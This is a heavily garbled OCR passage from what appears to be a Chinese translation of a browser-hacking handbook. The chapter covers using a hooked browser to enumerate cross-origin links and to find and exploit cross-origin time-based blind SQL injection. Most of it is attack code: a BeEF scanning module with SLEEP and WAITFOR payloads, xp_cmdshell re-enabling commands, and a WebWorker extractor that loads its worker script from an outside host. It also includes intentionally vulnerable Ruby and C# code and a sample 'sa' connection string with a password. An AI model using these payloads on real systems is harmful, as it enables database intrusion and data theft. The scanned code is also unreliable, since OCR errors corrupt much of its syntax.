检测 跨 域 资源 


当前 勾 连 的 源 可 能 包含 一 些 对 其 他 源 的 链接 , 这些 链接 中 包含 其 他 源 的 目录 和 参数 , 而 这 些 
源 也 有 可 能 被 勾 连 。 当 前 勾 连 的 应 用 如 果 是 一 个 内 部 维基 , 那 价值 会 非常 大 ,因为 其 中 可 能 包含 
很 多 指向 其 他 内 部 Web 应 用 的 链接 。 虽 然 探索 外 部 匀 连 的 源 不 大 可 能 有 效 ， 但 还 是 有 必要 一 试 ， 
因为 过 程 比 较 简单 。 

在 当前 勾 连 的 页 面 中 ， 可 以 使 用 如 下 代码 ， 枚 举 同 源 和 跨 域 的 链接 以 及 表单 动作 : 

// 找到 当前 页 面 中 所 有 href 和 表单 action， 枚 举 所 有 action 属 性， 并 检查 资源 是 否 同 源 


function getFormActions (doc) { 
var formsarray = []; 
var forms = doc.getElementsByTagName ("form") ; 
for next section. (var i=0; i < forms.length; i++) { 
var action = forms[i].getAttribute('action'); 
formsarray = formsarray.concat (action); 
// 枚 举 a 元 素 : 这 样 jsSameOrigin() 对 a 和 form 的 调用 方式 一 样 
var a = doc.createElement('a'); 
a.href = action; 
console.log("Discovered form action: " + action 
+ ". SameOrigin: " + isSameOrigin(a)); 
j 
return formsarray; 


) 
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// 找到 当前 页 面 中 所 有 a 元 素 枚 举 href 属 性 ， 检查 资源 是 否 同 源 
function getLinks (doc) { 
var linksarray = []; 
var links = doc.links; 
for(var i=0; i«links.length; i++) { 
var link = links[i]; 
linksarray = linksarray.concat (link) 
console.log("Discovered link: " + link.href 
+ ". SameOrigin: " + isSameOrigin(link)); 
F? 
return linksarray; 


} 


// 检查 协议 、 主 机 名 和 端口 
function isSameOrigin(url) { 


var sameOrigin = false; 

if(url.hostname.toString() === location.hostname.toString() && 
url.port === location.port && 

url.protocol === location.protocol) { 


sameOrigin = true; 
J 


return sameOrigin; 


} 


getLinks (document) ; 
getFormActions (document) ; 


前 面 的 代码 使 用 getLinks () 函数 获得 当前 文档 中 所 有 的 a 元 素 ， 然 后 调用 isSameorigin () 
函数 检测 发 现 的 资源 是 同 源 还 是 跨 域 。 同 样 ， 对 form 元 素 也 是 如 此 ， 但 这 里 枚 举 的 是 action 属 
性 。 因 为 issameorigin () 只 检测 a 元 素 ， 为 了 对 链接 和 表单 使 用 同样 的 函数 ， 所 以 要 使 用 for 
action 的 值 动态 创建 一 个 a 元 素 : 

var action = forms[i].getAttribute('action'); 

// 模仿 a 元 素 : 这 样 一 来 ， 对 于 a 元 素 和 form 元 素 ，isSameOrigin() 都 可 以 以 同样 的 方式 被 调用 


var a = doc.createElement ('a'); 
a.href = action; 















































console.log("Discovered form action: " + action 

+ ". SameOrigin: " + isSameOrigin(a)); 

图 9-10 展 示 了 在 包含 如 下 内 容 的 测试 页 面 http:/localhosytexthtmL 上 ， 执 行 前 面 代 码 的 结果 : 
<html><body> 


<a href="http://www.beefproject.com">BeEF Project</a><br /> 
<a href="http://ha.ckers.org/">ha.ckers.org </a><br /> 

<a href="http://localhost:8080/login">Login</a><br /> 

<a href="/demos/butcher/index.html">BeEF hook</a><br /> 
<form action="http://browserhacker.com"></form> 

<form action="//browserhacker.com:9090/login"></form> 
<form action="/login"></form> 

«/body»«/html» 
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(4) ® localhost test im c] El 





ris > 


||| Console ~ HTML CSS Script DOM Net Cookies 








iè Clear Persist Profile All Errors Warnings Info Debug info Co 
>>> // discovers all the FORM elements in the curren...} 
getLinks(document); getFormActions(document); 

Discovered link: http://www.beefproject.com/. SameOrigin: false 
Discovered link: http://ha.ckers.org/. SameOrigin: false 

Discovered link: http://localhost:8080/login. SameOrigin: false 
Discovered link: http://localhost/demos/butcher/index.html. 
SameOrigin: true 

Discovered form action: http://browserhacker.com. SameOrigin: false 


Discovered form action: //browserhacker.com:9090/login. SameOrigin: 
false 


Discovered form action: /login. SameOrigin: true 
[ "http://browserhacker.com", "//browserhacker.com:9090/1login", 


var formsarray * []; 
var forms = doc.getElementsByTagName("form"); 
for (var i90; i < forms.length; i++){ 
var action = forms[i].getAttribute('action'); 
formsarray = formsarray.concat(action); 
// emulates an A element: in this way isSameOrid 
// can be called in the same way for both A and 
var a = doc.createElement('a'); 
a.href = action; 
console.log("Discovered form action: 
* ". SameOrigin: 


" * action 
”+ isSameOrigin(a)); 


) 
return formsarray; 


// discovers all the A elements in the current paq 
// enumerates the HREP attribute, and checks if t 
// is same or cross-origin 

function getLinks(doc){ 

var linksarray = []; 

var links = doc.links; 

Pari teer Sir i rtm 


"/login" J Run Clear Copy History 


图 9-10 ”识别 跨 域 资源 





再 进一步 , 可 以 迭代 getLinks () MlgetFormActions () 函数 返回 的 数组 ， 取 得 以 XHR 调 用 
形式 发 送 的 同 源 资源 。 在 找到 这 些 资源 后 ， 可 以 通过 XHR 响 应 内 容 创建 一 个 新 的 Document 对 象 ， 
然后 再 调用 这 两 个 函数 枚 举 来 自 那 些 新 同 源 资源 中 的 链接 和 表单 。 

假设 要 取得 同 源 资源 /demos/butchervindex.html 的 内 容 ， 可 以 使 用 如 下 代码 : 


var xhr = new XMLHttpRequest (); 
xhr.open("GET", "/demos/butcher/index.html"); 
xhr.onreadystatechange - function () ( 
if (xhr.readyState -- 4) ( 
try{ 
// 从 XHR 响 应 创建 一 个 新 的 Document 对 象 
var doc = new DOMParser().parseFromString( 
xhr.responseText, "text/html" 
Y 
getLinks (doc); 
getFormActions (doc); 
jcatch(e) (3 
j 
j 


xhr.send(); 


这 段 代码 在 基于 XHR 响 应 创建 的 新 Document 对 象 上 ( 包含 在 aoc 变 量 中 ), 调用 了 getLinks O 
意 ， 这 里 使 用 了 DOMParser.parseFromString()"。 对 于 Chrome 

















和 getFormActions ()。 注 意 ， 
和 Safari 等 不 支持 parseFromString () 的 浏览 器 ,使 用 text /html 作 为 输入 参数 ， 可 以 使 用 Eli 
Grey 的 下 面 这 个 polyfill ， 来 覆盖 barseFromSstring () 的 原型 : 
(function(DOMParser) { 
"use strict"; 


var DOMParser_proto = DOMParser.prototype 
, real parseFromString = DOMParser. proto.parseFromString; 
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// Firefox/Opera/IE 在 不 支持 的 类 型 上 抛 出 错误 
try { 
// WebKit 在 不 支持 的 类 型 上 返回 null 
if ((new DOMParser).parseFromString("", "text/html")) { 
// text/html 解 析 方 法 是 被 原生 支持 的 
return; 
} 
} catch (ex) {} 


DOMParser_proto. ee a = function(markup, type) { 
if (/*\s*text\/html\s* ;l$)/i.test(type)) { 

var doc = document. Be ot ee E? 
, doc elt = doc.documentElement 

, first elt; 


doc elt.innerHTML - markup; 
first elt - doc elt.firstElementChild; 


if (doc elt.childElementCount --- 

&& first elt.localName.toLowerCase() --- "html") ( 
doc.replaceChild(first elt, doc elt); 

} 





return doc; 
} else { 
return real_parseFromString.apply(this, arguments); 
} 
局 
} (DOMParser) ); 


有 了 上 面 的 代码 ， 就 可 以 在 当前 勾 连 的 页 面 中 枚 举 同 源 和 跨 域 资源 , 而 且 还 可 以 枚 举 新 发 现 
的 同 源 资源 。 这 些 资源 的 信息 对 于 下 面 儿 闻 介绍 的 攻击 技术 会 非常 有 用 。 


9.7” 跨 域 Web 应 用 漏洞 检测 


显然 ，SOP 限 制 了 很 多 攻击 。 然 而 ,我 们 也 知道 ， 有 志 者 事 竞 成 。 现 实 中 也 存在 很 多 方法 ， 
可 以 在 不 违反 SOP 的 情况 下 ， 实 现 跨 域 攻击 。 

接 下 来 的 一 个 小 节 就 来 讨论 这 类 技术 ， 包 括 如 何在 勾 连 浏 览 絮 中 发 现 XSS 和 SQL 注 入 漏洞 
(在 与 目标 不 同 的 源 中 )。 








9.7.1 SQL 注入 漏洞 


SQL 注 入 或 SQLi 漏 洞 指 的 是 攻击 者 可 以 修改 从 Web 应 用 发 送 到 数据 库 的 SQL 语 句 。 对 于 SQL 
注 和 攻击， 我们 不 会 讨论 太 多 ， 而 是 想 给 大 家 推荐 关于 这 个 话题 的 另外 两 本 专著 : The Database 
Hacker s Handbook FISOL Injection Attacks and Defense" , 
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1. 常规 SQL 注入 检测 

SQL 注入 攻击 可 以 根据 bug 的 不 同 分 为 不 同类 别 。 通 常 来 说 ,可 以 按照 HTTP 响 应 返回 的 数据 
种 类 来 区 分 注入 。 如 果 返 回 的 是 类 似 下 面 这 样 的 SQL 错误 ， 就 可 以 实施 基于 错误 的 SQLi: 

You have an error in your SQL syntax; check the \ 


manual that corresponds to your MySQL server version \ 
for the right syntax to use near ''' at line 1 


某 些 情况 下 ， 即 使 SQL 语句 中 包含 错误 ，Web 应 用 也 根本 不 会 返回 错误 。 这 种 类 型 的 SQLi 
通常 叫 作 Blind SQLi， 因 为 从 数据 库 或 应 用 得 不 到 任何 错误 。 

此 时 ， 通 过 对 比 正 常 请 求 和 恶意 请 求 的 HTTP 响 应 之 间 的 区 别 ， 也 可 以 检测 到 SQLi 是 否 会 影 
响 某 些 资 源 。 前 述 区 别 可 以 分 为 两 种 。 一 种 是 内 容 长 度 不 同 ， 也 就 是 返回 的 响应 体 的 内 容 不 同 。 
另 一 种 是 响应 时 间 不 同 ， 比 如 常规 响应 时 间 是 1 秒 ， 而 恶意 响应 却 需要 5 秒 。 下 面 来 看 一 段 Ruby 
代码 ， 这 段 代 码 是 可 以 被 SQL 注入 的 : 


get myn do 
Gconfig = ConfigReader.instance.config 































































































# 从 GET 请 求 中 取得 book_id 参 数 

book_id = params[:book_id] 

# MySQL 连 接 池 

pool = Mysql2::Client.new( 
:host => @config['db_host'], 
:username => @config['restricted_db_user'], 
:password => @config['restricted_db_userpasswd'], 
:database => @config['db_name' ] 


) 
begin 
if book_id == nil 
@rs = pool.query "SELECT * FROM books;" 
else 
# 车 找到 一 个 特定 的 book_id 参 数 
# 就 执行 以 下 未 加 密 查 询 


query = "SELECT * FROM books WHERE id=" + book_id + ";" 
@rs = pool.query query 
end 


erb :"sqlinjection" 
rescue Exception => e 


Grs = {} 
@error_message = e.message 


erb :"sqlinjection" 
end 
end 


如 果 将 一 个 类 似 /page?book_id=1' 的 GET 请 求 发 送 给 这 段 代码 中 的 处 理 程 序 ,那么 数据 库 
就 会 返回 类 似 前 面 的 错误 信息 。 只 要 发 送 像 下 面 这 样 检 索 MySQL 数 据 库 版 本 的 查询 ， 就 可 以 利 
用 这 种 基于 错误 的 SQLi: 


/page ?book_id=1+UNION+ALL+SELECT+NULL%2C%40%40VERSION%2CNULL%23 
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最 终 的 SQL 语句 会 被 攻击 者 在 SELECT * FROM books WHERE idq=1 后 面 追加 上 UNION ALL 
SELECT NULL，Q@Q@VERSION，NULL。Web 应 用 的 那个 拼接 的 查询 (query = "SELECT * FROM 
books WHERE id=" + book id +";") 之 所 以 不 安全 ， 是 因为 参数 值 book_ig 未 经 输入 验 
证 就 被 用 于 字符 串 拼接 。 这 种 [没有 预 处 理 语句 (Prepared Statements ) “ ] 的 查询 结果 ， 会 使 应 
用 面临 SQL 注入 的 风险 。 

再 考虑 一 种 情况 。 假 设 前 面 存在 漏洞 的 代码 除了 把 底部 的 一 行 (eerror_message = 
e.message ) 删除 之 外 ， 其 余 都 相同 ， 那 么 此 时 仍然 可 以 被 SQL 注入 攻击 ， 只 不 过 变 成 了 Blind。 

假设 你 事先 并 不 知道 这 一 点 ， 而 想 要 检测 某 个 资源 是 否 可 以 实施 SQLi。 可 以 发 送 下 面 这 个 
GET 请 求 : 

/page?book_id=1+AND+SLEEP (5) 

然后 ,经 过 大 约 5 秒 钟 ， 你 才 会 收 到 HTTP 响 应 。 这 么 长 的 响应 时 间 意 味 着 该 资源 存在 SQL 注 
和信 漏洞， 因为 SLEEP 语句 被 成 功 执行 了 。 

以 上 只 是 比较 浅显 的 SQL 注入 检测 。 如 果 你 觉得 这 些 内 容 不 好 理解 , 那 最 好 在 阅读 后 面 的 内 
容 之 前 ， 先 补习 一 下 相关 的 攻击 技术 知识 。 

2. 跨 域 SQL 盲 注 检 测 

本 章 第 一 节 讨论 过 ， 即 使 是 跨 域 请 求 , 仍然 可 以 确定 请 求 是 否 成 功 。 MA, 还 可 以 根据 响应 
的 时 间 来 推断 更 多 细节 。 

SOP 会 阻止 读 取 跨 域 XMLHttpRequest 的 响应 体 , 因而 在 匀 连 浏览 器 上 发 现 基 于 错误 的 SQLi 
并 不 现实 。 此 时 ， 可 以 利用 路 域 响应 计时 ， 以 及 基于 时 间 的 SQL 注入 。 这 样 就 可 以 看 到 跨 域 SQL 
注入 的 结果 ， 从 而 发 现 并 利用 SQL 注入 漏洞 。 

执行 下 面 的 代码 可 以 使 用 时 间 延 迟 , 以 发 现 跨 域 Web 应 用 中 的 SQLi 漏 洞 。 这 段 代码 目前 支持 
可 以 通过 GET 请 求 访 问 的 资源 ， 而 要 修改 成 支持 POST 请 求 的 资源 也 很 简单 。 

另外 ， 目 前 只 支持 MySQL 、PostgreSQL 和 MSSQL ， 因 为 只 有 它们 有 时 间 延 迟 的 SQL 语句 。 
正如 Chema Alonso 所 演示 的 ”， 即 使 是 耗 时 的 查询 也 可 以 感知 到 时 间 延 迟 。 同 样 ， 因 为 Oracle 支 
持 发 送 HTTP 和 DNS 请 求 的 功能 ， 所 以 还 可 以 进行 相应 的 确认 : 


beef.execute(function() { 
































































































































// 以 秒 计 的 延迟 
var delay = '<%= @delay %>'; 


// 目标 主机 /端口 
var host = '<%= @host %>'; 
var port = '<%= @port %>'; 


// 要 扫描 的 目标 URL 


var uri = '<%= @uri %>'; 


// 要 扫描 的 URL 参 数 ， 格 式 为 : key-value 
var param = '<%= @parameter %>'; 
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/* 需 要 处 理 主要 注入 的 向 量 
* 如 果 有 嵌 套 的 JOIN 需 要 额外 的 括号 
* param 和 delay 是 占 位 符 ， 
* 稍 后 会 在 create_vector () 中 替换 


*/ 

var vectors = [ 
"param AND delay", "param' AND delay", 
"param) AND delay", "param AND delay --", 
"param' AND delay --", "param) AND delay --", 


"param AND delay AND 'rand'-'rand", 
"param' AND delay AND 'rand'='rand", 
"param' AND delay AND ('rand'='rand", 
"param; delay --" 

I; 


var db types = ["mysql"; "mssql", "postgresql"]; 
var final_vectors = []; 


/* APANDBARA A Bl 0 38 IR 78 4] 
* 关于 Oracle/DB2 及 其 他 信息 ， 请 参考 Chema Alonso 的 重 查询 : 
http://technet .microsoft.com/en-us/library/cc512676.aspx */ 
function create_vector(vector, db_type) { 
var result = ""; 
if(db type == "mysql") 

result = vector.replace("param",param) 
.replace("delay","SLEEP(" + delay + ")"); 
if(db type == "mssql") 

result = vector.replace("param",param) 
.replace("delay","WAITFOR DELAY '0:0:" + delay + "'"); 
if(db type == "postgresql") 

result = vector.replace("param",param) 

.replace("delay","PG SLEEP(" + delay + ")"); 





console.log("Vector before URL encoding: " + result); 
return encodeURI (result); 


) 


// 根据 支持 数据 库 替 换 param 和 qdqelay 占 位 符 
function populate global vectors()( 
for(var i=0;i<db_types.length; i++) { 
var db type = db types[i]; 
for (var e=0;e<vectors.length;e++) { 
final_vectors.push(create_vector(vectors[e], db_type)); 


var vector_index = 0; 

function next_vector() { 

result = final vectors[vector index]; 
vector, index-4-«; 

return result; 


) 
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var send_interval; 
var successfulVector = "" 
function sendRequests() { 
var vector = next_vector(); 
var url = uri.replace(param, vector); 
beef.net.forge request("http", "GET", host, port, url, 
null, null, null, delay + 2, 'script', true, null, 
function(response)( 
// JeXXHRWSRAÉGR, 停止 进程 
// 因为 某 个 successfulVector 已 被 发 现 
if (response.duration >= delay * 1000) { 
successfulVector = url; 
console.log("Response delayed with vector [" + 
successfulVector + "]"); 
clearInterval (send interval); 
} 
}); 
} 


// 创建 所 有 向 量 


populate global vectors(); 


/* 确定 正常 的 响应 时 间 ， 并 且 调 整 请 求 之 间 的 延迟 

* (基准 响应 时 间 +500 ms) */ 

var response_time; 

beef.net.forge request("http", "GET", host, port, uri, 

null, null, null, delay + 2, 'script', true, null,function(response)( 
response time - response.duration; 


send interval = setInterval (function() { 
sendRequests()),response time + 500); //can be adjusted 

be 

3): 


把 前 面 的 代码 注入 勾 连 浏览 器 之 后 ， 会 调用 populate_global_vectors () ， 并 根据 支持 
的 数据 库 类 型 和 向 量 数组 中 的 载荷 , 来 创建 攻击 向 量 。 这 里 的 载荷 并 不 完整 , 但 对 大 多 数 攻 击 来 
说 已 经 足够 了 。 你 可 以 根据 自己 的 需求 再 进行 添加 , 比如 增加 更 多 括号 或 使 用 不 同 的 布尔 关键 字 ， 
以 涵盖 般 套 的 联结 或 非常 复杂 的 查询 。 

攻击 的 下 一 步 是 发 送 不 带 任何 攻击 向 量 的 请 求 , 以 监控 常规 响应 时 间 。 这样 才 能 有 依据 地 对 
后 续 攻 击 向 量 作出 调整 ， 因 为 目标 可 能 对 常规 请 求 都 会 花 几 秒 才 响 应 。 确 定 了 基准 响应 时 间 后 ， 
通过 sendRequests() 函数 发 送 所 有 可 用 的 攻击 向 量 。 每 个 XHR 请 求 在 处 理 后 , 都 会 有 回调 函数 
在 响应 到 达 后 检测 响应 时 间 。 如 果 响 应 时 间 等 于 或 大 于 注入 的 延迟 , 则 说 明 注 入 成 功 ， 并 可 以 确 
认 存 在 基于 时 间 的 SQLi 漏 洞 。 在 图 9-11 和 图 9-12 中 , 可 以 看 到 通过 BeEF 在 勾 连 浏览 器 中 注入 代码 
后 ， 内 部 发 生 了 什么 。 
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> GET challenge 3?book id«1& «1365 200 OK 


V http://dvsl.local:4000/challeng ?book id= 1%20AND%208 
Params Headers Response Cache HTML Cookies 


. 1365857690444 
book id 1 AND SLEEP(5) 


图 9-11 


Vector before URL encoding: 
Vector before URL encoding: 
Vector before URL encoding: 
Vector before URL encoding: 
Vector before URL encoding: 


e SyntaxError: syntax error 
<html> 

> GET http://192.168.0.2:30001hookjs?BEEFHOOK=1E5kYDE-.hLzJOMqf83zIN399DF6jo, 

Response delayed| with vector [/challenge. 3?book id-1X20ANDX20SLEEP(5)] 


常规 响应 时 间 lc 
dvsl.local:4000 2.1KB  127.0.0.1:4000 V 7ms 


1.8KB  127.0.0.1:4000 NE so: 


延迟 后 的 响应 时 间 





成 功 的 SQLi 攻 击 的 时 间 延 迟 


book id-1) AND PG SLEEP(5) -- 

book id-1 AND PG SLEEP(S) AND 'rand'-'rand 
book id-1' AND PG SLEEP(5) AND 'rand'-'rand 
book id-1' AND PG SLEEP(5) AND ('rand'-'rand 
book id-1; PG SLEEP(5) -- 


注意 ,浏览 器 勾 连 在 不 同 的 域 





3. 跨 域 SQL 盲 注 利用 





图 9-12 ”记录 成 功 的 SQLi 攻 击 





好 了 , 现在 你 已 经 可 以 检测 到 哪个 跨 域 资源 存在 SQL 注入 漏洞 了 ， 而 且 也 知道 了 使 用 的 是 什 
么 数据 库 。 有 了 这 些 信息 ， 就 可 以 想 办 法 执行 一 些 操作 系统 命令 ， 或 者 提取 数据 库 中 的 数据 。 
执行 操作 系统 命令 在 很 大 程度 上 依赖 于 数据 库 配 置 是 否 存在 问题 , 特别 是 那些 有 关 当 前 数据 


库 用 户 许 可 和 权限 级 别 的 设置 是 否 有 问题 。 如 果 数 据 库 是 MSSQL ， 则 可 以 使 用 存储 过 程 





























xp_cmdshel1 () ， 在 操作 系统 中 执行 命令 ， 其 至 接管 用 户 。 不 过 要 知道 ， 该 应 用 的 数据 库 用 户 
必须 拥有 sysadmin 角 色 ， 才 能 使 用 这 个 存储 过 程 。 从 MSSQL 2005 开 始 ， 这 一 特性 默认 被 禁用 ， 
不 过 调用 spb_configure () 存 储 过 程 可 以 再 启用 它 ”。 
































使 用 如 下 MSSQL 语 句 ， 可 以 检测 是 否 可 以 执行 上 述 存 储 过 程 。 当 然 ， 需 要 在 适当 的 HTTP 请 


求 中 把 它们 格式 化 ， 才 能 偷偷 地 输入 数据 库 。 


EXEC sp_configure 'show advanced options',1;RECONFIGURE 
EXEC master..xp cmdshell('ping -n 10 localhost') 








第 一 个 请 求 用 于 重新 启用 xp_cmdqshel1l () 存 储 过 程 ( 如果 之 前 是 被 禁用 的 )。 第 二 个 请 求 





会 在 成 功 启用 该 存储 过 程 〈 或 者 原本 就 已 经 启用 )， 而 且 用 户 角 色 为 sysadmin 的 情况 下 ， 创 建 一 
个 时 间 延 迟 响 应 。 在 这 里 ， 攻 击 向 量 中 的 时 间 延 迟 是 使 用 标准 的 ping 工 具 执 行 10 次 ping 
localhost 来 达成 的 ， 所 需 时 间 大 约 9~10 秒 。 如 果 你 看 到 了 期 望 的 延迟 ， 就 可 以 继续 执行 其 他 


操作 系统 命令 了 。 





Tr 





至 于 提取 数据 ， 可 以 修改 前 面 的 代码 ， 添 加 支持 二 进 制 提取 的 算法 。 该 算法 与 Chris Anley 在 
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他 的 论文 ze ues injection" ges 并 在 Sqlmap 中 实现 的 类 似 。 比 如 ， 要 确定 当前 数 
据 库 名 称 的 第 一 个 字 节 的 第 一 位 是 0 还 是 1， 可 以 在 MSSQL 中 使 用 下 面 的 向 量 : 











declare @s varchar(8000) select @s = db name() if (ascii(substring \ 
(Ges, 1, 1)) & (power(2, 0))) > 0 waitfor delay '0:0:5' 


如 果 响 应 延迟 了 5 秒 , 则 可 以 确定 第 一 位 是 1。 然 后 用 下 面 的 向 量 继续 检测 第 一 个 字 节 的 第 二 
以 此 类 推 : 


declare @s varchar(8000) select @s = db name() if (ascii(substring \ 
(Ges, 1, 1)) & (power(2, 1))) > 0 waitfor delay '0:0:5' 


基于 时 延 的 数据 提取 显然 没有 考虑 到 速度 。 需 要 发 送 的 请 求 可 能 是 几 百 甚至 几 千 个 。 确 定 一 











ux 

















个 8 字符 的 词 是 什么 ， 需 要 64 个 请 求 。 不 过 要 知道 ， 这 些 请 求 并 非 必须 按 顺序 发 送 ， 不 一 定 等 上 


个 完成 才能 发 送 下 一 个 。 此 时 XHR 的 异步 性 就 能 帮 上 大 忙 。 还 可 以 使 用 WebWorker， 以 类 似 启 


新 线程 的 方式 来 加 于 束 提取 数据 的 过 程 。 








看 下 面 的 例子 ， 这 是 一 个 ASPNET 应 用 ， 它 使 用 MSSQL 2008， 故 意 留 下 了 漏洞 。 其 中 的 





book_iq 参 数值 中 就 有 可 以 跨 域 利用 的 SQL 注 和 漏洞。 服务 顺 端 C# 代 码 如 下 : 


public partial class _Default : System.Web.UI.Page(í 

// A Web.config 中 取得 SQLserver 2008 的 连接 信息 

protected SqlConnection dbConn = new SqlConnection ( 
ConfigurationManager.ConnectionStrings["sqlserver"].ToString() 


1s 


protected void Page Load(object sender, EventArgs e) { 


if(Request.QueryString["book id"] != null)( 
// 看 在 SQL 注入 漏洞 的 SQL 查询 
string sql = "SELECT * FROM books WHERE id = " + 


Request .QueryString["book_id"]; 


SqlCommand cmd = new SqlCommand(sql, dbConn) ; 
dbConn.Open(); 


// ERER 
SqlDataReader results = cmd.ExecuteReader(); 
string response = ""; 
while (results.Read() ) { 
response += "<b>Book name:</b> " + results["name"] + 
"<br><b>Book authors:</b> " + results["author"]; 
j 
Response.Write(response); 
results.Close(); 
dbConn.Close(); 
} 
} 
} 


与 所 有 ASPNET 应 用 一 样 , 这 个 应 用 也 使 用 了 Web.config 文 件 , 其 中 包含 连接 数据 库 的 信息 : 


<add name="sqlserver" 
connectionString="server=localhost; 
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database=sql_InjEction_1234;uid=sa;password=Abcd-1234;" 
providerName="System.Data.SqlClient"/> 
</connectionStrings> 


根据 MDN ( Microsoft Developer Network， 微 软 开 发 者 网 络 ) 的 描述 2 以 及 本 章 前 面 简单 的 演 
示 ， 如 果 在 同一 个 MSSQL 服 务 器 上 指定 了 多 个 WAITFOR 语 句 ， 那 它们 将 在 不 同 的 线程 中 分 别 执 
行 。 除 非 数据 库 服务 器 由 于 高 负载 而 产生 线程 饥饿 (thread starvation )， 否 则 来 自 不 同 的 HTTP 请 
求 的 多 个 WAITFOR 语 句 会 按照 预期 执行 。 

并 非 所 有 数据 库 都 这 样 。MSSQL 好 像 是 唯一 一 个 足以 支持 并 行 时 延 的 数据 库 。 正 因为 如 此 ， 
Sqlmap 在 处 理 基于 时 间 的 SQL 谊 注 时 ， 会 完全 禁用 多 线程 。 不 过 在 MSSQL 中 ， 使 用 基于 时 间 的 
SQL 盲 注 并 行 检索 数据 还 是 可 能 的 ， 本 章 后 面 还 会 再 介绍 。 

利用 上 述 ASP.NET 应 用 的 漏洞 ， 可 以 通过 以 下 代码 检索 当前 数据 库 的 名 称 。 这 上段 代码 有 两 个 
部 分 : 一 部 分 是 由 每 个 WebWorker 执 行 的 代码 ， 另 一 部 分 是 WebWorker 控 制 需 。 每 个 WebWorker 
都 会 执行 下 列 代码 : 


var uri, port, path, payload; 
var index, seconds, position; 
































/* 配置 来 自 实 例 化 此 WebWorker (控制 器 ) 的 代码 */ 
onmessage = function (e) { 

uri = e.data['uri']; 

port = e.data['port']; 

path = e.data['path']; 

payload = e.data['payload']; 


index = e.data['index']; 
seconds = e.data['seconds']; 
position = e.data['position']; 


retrieveChar (index, seconds, position); 


Fr 


function retrieveChar(index, seconds, position) { 
var lowerbound = 1; 

var upperbound = 127; 

var index; 

var isLastReqSleep = false; 

var reqNumber = 0; 

// 如 果 所 有 请 求 都 不 延迟 ， 说 明正 在 查询 范围 外 的 地 址 


var stringEndReached = true; 





function doRequest (index, seconds, position) { 


if (lowerbound <= upperbound) { 

reqNumber++; 

index = Math.floor((lowerbound + upperbound) / 2); 

var enc_payload = encodeURI (payload + position + ",1))>" + index + 
") WAITFOR DELAY '0:0:" + seconds + "'--"); 

// 负载 类 似 于 IF (UNICODE (SUBSTRING ( (SELECT V 
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// ISNULL(CAST(DB NAME() AS NVARCHAR(4000)),CHAR(32))), 
var xhr - new XMLHttpRequest(); 
var started - new Date().getTime(); 


xhr.open("GET", uri + ":" + port + path + enc payload, false); 
xhr.onreadystatechange=function() { 

if(xhr.readyState == 4){ 

var finished = new Date().getTime(); 

var respTime = (finished - started) /1000; 


/* 二 进 制 推断 。 每 字符 7 个 请 求 可 以 确定 该 字符 的 二 进 制 表示 。 
* 如 果 请 求 至 少 N 秒 不 延迟 ， 可 以 推断 该 字符 的 二 进 制 表示 不 大 于 
* 'index' 127: IF(115>127) WAITFOR。 同 样 ， 继 续 ， 将 'index' 改 为 63 
* 
/ 
if(respTime >= seconds) { 
lowerbound = index + 1; 


if (reqNumber == 7) isLastReqSleep = true; 
stringEndReached = false; 
}else{ 


upperbound = index - 1; 
} 
/* 递归 调用 doRequest() */ 
doRequest (index, seconds, position); 
1j 


xhr.send(); 


}else{ 

if (isLastReqSleep) { 
index++; 

} 

/* 通知 WebWorketr 控 制 器 ， 传 递 当 前 位 置 的 字符 
* StringEndReachedq==true 表 示 超 过 范围 ， 找 到 了 全 部 数据 
*/ 

postMessage ( 





{'position':position, 'char':index, 'end':stringEndReached} 
X 
self.close(); //close the worker 
return index; 
} 
j 


// 发 送 请 求 
doRequest (index, seconds, position); 


} 

以 上 代码 使 用 二 进 制 推断 ， 来 检索 指定 位 置 的 每 个 字符 的 十 进 制 表示 。 我 们 知道 ，ASCII 
字符 可 能 的 值 是 1 (SOH ) 到 127 (DEL )， 涵 盖 了 小 写 和 大 写 的 数字 和 字母 ， 包 括 符号 。 使 用 二 
进 制 推断 ， 可 以 通过 7 次 迭代 (7 次 请 求 )， 取 得 字符 串 ( 这 里 的 数据 库 名 称 ) 中 的 每 个 字符 。 给 
前 面 的 代码 添加 console.1log() ， 就 可 以 看 到 如 何 检索 到 数据 库 名 的 第 一 个 字符 ,本 例 的 结果 


是 s: 

















Response delayed. Char is > 64 
Response delayed. Char is > 96 
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Response delayed. Char is > 112 

Response not delayed. Char is < 120 
Response not delayed. Char is < 116 
Response delayed. Char is > 114 

Response not delayed. Char is == 115 -> s 


第 一 个 跨 域 HTTP 请 求 会 指向 以 下 URL， 因 为 我 们 要 检索 数据 库 名 称 的 第 一 个 字符 : 


http://172.16.37.149:8080/?book_id=1%20IF (UNICODE (SUBSTRING ( 
(SELECT%20ISNULL (CAST (DB_NAME () $20AS%20NVARCHAR (4000) ), 
CHAR(32))),1,1))$3E64) S20WAITFOR%2 0DELAY%203270:0:2%27-- 


而 响应 〈 可 以 通过 前 面 的 console.1log() 输 出 看 到 ) 被 延迟 了 ， 因 为 115>64。 整 个 过 程 继 
续 直 至 lowerbound <= upperbound， 也 就 是 说 没有 更 多 迭代 了 ， 因 为 115<116， 并 日 115>114， 
所 以 最 终 这 个 字符 就 是 115。WebWorker 完 成 任务 后 ， 会 使 用 postMessage () 把 结果 发 送 给 父 控 
DEI 

postMessage({'position':position, 'char':index, 'end':stringEndReached]); 

每 一 个 WebWorker 负 责 检索 特定 位 置 上 的 一 个 字符 。 而 启动 它们 和 验证 结果 的 任务 ， 则 是 由 
以 下 控制 器 代码 完成 ; 


if(!!window.Worker) { 















































// WebWorker 代 码 


Var wwloc = "http://browserhacker.com/time-based-sqli/worker.js"; 

// 初始 化 

var uri = "http://172.16.37.149"; 

var port = "8080"; 

var path = "/?book_id=1"; 

var payload = " IF (UNICODE (SUBSTRING( (SELECT ISNULL(CAST(DB NAME()" + 


" AS NVARCHAR (4000) ),CHAR(32))),"; 
var timeDelay = 2; // #R MM Ayre 
var position = 1; 

// 保存 取得 字符 的 数组 

var dbname = []; 

var dbname_string = ""; 

// 内 部 变量 

var dataLength = 0; 

var workersDone = 0; 

var successfulWorkersDone = 0; 


// 并 行 执行 的 WebWorkeLr 数 量 

// (1 个 WebWorker 处 理 1 个 字符 位 ) 

var workers_number = 5; 

// 每 秒 调用 1 次 checkComplete() 

var checkCompleteDelay = 1000; 
var start = new Date().getTime(); 


/* 3& Kdbname , 将 字符 从 十 进 制 转换 为 字符 */ 
function finish() { 

dbname.shift(); // 移 除 第 一 个 0 索引 
for (var i=0; i<dbname.length; i++) { 
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dbname string += String. fromCharCode(dbname[i]); 


} 


console.log("Database name is: " + dbname string); 
var end = new Date().getTime(); 


console.log("Total time 


} 


